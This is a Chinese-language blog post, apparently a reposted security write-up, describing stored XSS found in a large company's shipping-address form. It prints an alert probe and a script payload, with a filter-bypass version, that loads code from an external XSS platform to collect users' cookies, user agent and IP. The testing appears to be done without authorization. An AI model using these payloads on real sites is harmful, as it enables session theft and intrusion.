【滲透實(shí)例】記錄一次XSS滲透過程

0x01 找到存在XSS的位置

沒什么技巧,見到框就X,功夫不負(fù)有心人,在目標(biāo)網(wǎng)站編輯收貨地址處發(fā)現(xiàn)了存在XSS的地方,沒想到這種大公司還會(huì)存在XSS。

使用的XSS代碼:<img src=1 onerror=alert(1)>
xss1.png

0x02 構(gòu)造XSS代碼連接到XSS平臺(tái)

XSS平臺(tái)給我們的XSS代碼是這樣的:

</tExtArEa>'"><sCRiPt sRC=https://xss8.cc/3Ri4></sCrIpT>
xss2.png

直接插入的話會(huì)提示參數(shù)非法,經(jīng)過多次嘗試,最后發(fā)現(xiàn)該平臺(tái)會(huì)對(duì)雙引號(hào)、script字符進(jìn)行識(shí)別過濾,大小寫會(huì)被過濾,于是嘗試插入下面的語句:

</tExtArEa>'\"><\sCRiPt sRC=https://xss8.cc/3Ri4></\sCrIpT>

這條代碼比上面平臺(tái)給的XSS代碼的多了幾個(gè) "\",也就是轉(zhuǎn)義字符,利用轉(zhuǎn)義字符可以繞過該平臺(tái)的策略,因?yàn)榻?jīng)驗(yàn)不足,所以在這一步嘗試了很多種辦法都沒能繞過,要不有的可以插入但是連不上XSS平臺(tái),要不有的就是被識(shí)別攔截。


xss3.png

加上轉(zhuǎn)義字符成功插入后,刷新目標(biāo)網(wǎng)站與XSS平臺(tái)頁面,在XSS平臺(tái)就能看到剛才的訪問記錄。


這里可以獲取該登陸用戶的Cookie、User-Agent、IP地址什么的,但是觸發(fā)這個(gè)XSS需要登陸存在XSS的賬號(hào)才行,所以個(gè)人覺著知道了這個(gè)Cookie也沒啥用。
并且雖然知道這里存在XSS,但是觸發(fā)條件是需要知道用戶名和密碼,然后來到收貨地址頁面,所以個(gè)人感覺作用不大,因此在想這個(gè)漏洞還有沒有其他的利用價(jià)值,后續(xù)或許會(huì)繼續(xù)更新本次滲透過程,如果你有什么好的想法,歡迎下方留言。

更多信息歡迎關(guān)注微信公眾號(hào):TeamsSix
本文僅用作學(xué)習(xí)交流目的,請(qǐng)勿用作違法目的
原文地址:https://www.teamssix.com/year/190703-221956.html

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容